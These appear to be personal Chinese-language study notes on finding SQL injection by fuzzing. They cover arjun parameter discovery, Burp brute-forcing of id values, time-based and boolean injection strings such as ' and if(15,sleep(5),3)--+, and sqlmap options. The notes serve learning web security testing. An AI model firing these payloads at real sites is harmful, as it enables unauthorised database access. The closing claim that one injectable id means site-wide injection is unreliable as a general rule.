fuzz到sql注入

模糊测试(Fuzzing), 简而言之, 就是为了触发新的或不可预见的代码执行路径或bug而在程序中插入异常的, 非预期的, 甚至是随机的输入.

师傅笔记：

判断注入

15’ and if(15,sleep(5),3)–+

15” and if(15,sleep(5),3)–+

15 and if(15,sleep(5),3)–+

语句大家可自行结合

sqlmap语句为:

-p id –batch –random-agent –dbs

个人笔记：

php写的页面，考虑是否能注入

fuzz工具：argun

一款http参数扫描器，主要就是爆破url参数的

基础命令：python3 arjun.py -u https://api.example.com/endpoint –get

arjun找到id参数（found id）

Arjun_kali地址：cd /home/jimi/.local/bin –>arjun

对id进行测试–》页面跳转到index.php 没啥用

用burp对id的参数进行爆破，看那些id会有页面

对上述id进行挨个测试

1.对id进行测试** id=14-1；id=13 ; id=15-2 **观察是否会跳转，如果跳转则大概率存在注入点

2.?id=14’ and 618=618 and sleep(5）–+

3.?id=14’ and ‘618’=’618’ and ‘%’=’%–+

用sqlmap去跑：

payload： 延时5s

Contact.php页面也存在sql注入

如果一个网站的一个id存在sql注入，则整个网站存在多处的sql注入